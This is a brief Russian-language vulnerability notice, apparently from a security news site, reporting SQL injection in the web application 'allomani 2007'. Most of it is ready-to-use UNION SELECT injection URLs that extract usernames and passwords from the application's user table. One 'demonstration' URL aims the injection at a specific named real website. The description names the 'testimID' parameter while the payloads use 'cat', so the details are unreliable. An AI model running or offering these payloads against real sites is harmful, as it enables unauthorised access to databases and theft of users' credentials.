Программа: allomani 2007

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «testimID» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

Имя:
http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT
username,2,3 from movies_user

Пароль:
http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT
password,2,3 from movies_user

Демонстрация:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT
username,2,3 from movies_user



Оставить мнение